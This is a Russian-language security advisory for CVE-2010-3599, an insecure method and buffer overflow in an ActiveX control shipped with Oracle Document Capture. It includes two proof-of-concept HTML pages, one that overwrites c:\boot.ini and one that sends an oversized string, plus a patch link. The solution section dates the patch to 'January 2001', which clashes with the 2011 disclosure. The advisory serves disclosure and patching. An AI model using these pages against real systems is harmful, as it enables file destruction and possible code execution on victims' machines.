CVE-2010-3599

Вендор

Oracle

Продукт

Oracle Document Capture 10.1.3.5 

Тип уязвимости

Небезопасный метод, переполнение буфера

Reported

14.12.2009

Date of Public Advisory

24.01.2011

Автор

Александр Поляков

Детальное описание

Злоумышленник может создать HTML страницу, которая вызовет уязвимую функцию 'WriteJPG" из ActiveX Object NCSECWLib.

Пример 1 (перезапись файла)
*********************************
<html> 
<script> 
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll" 
prototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )" 
memberName = "WriteJPG" 
progid = "NCSECWLib.NCSRenderer" 
argCount = 3 

arg1="c:\boot.ini" 
arg2=1 
arg3=True 

target.WriteJPG arg1 ,arg2 ,arg3 

</script> 
</html> 

Пример 2
***********
<html> 
<script> 
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll" 
prototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )" 
memberName = "WriteJPG" 
progid = "NCSECWLib.NCSRenderer" 
argCount = 3 

arg1=String(13332, "A") 
arg2=1 
arg3=True 

target.WriteJPG arg1 ,arg2 ,arg3 

</script></job></package> 

Решение
********** 
Информация была опубликована в CPU, Январь 2001.
Все пользователи могут загрузить патчи, следуя инструкциям:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html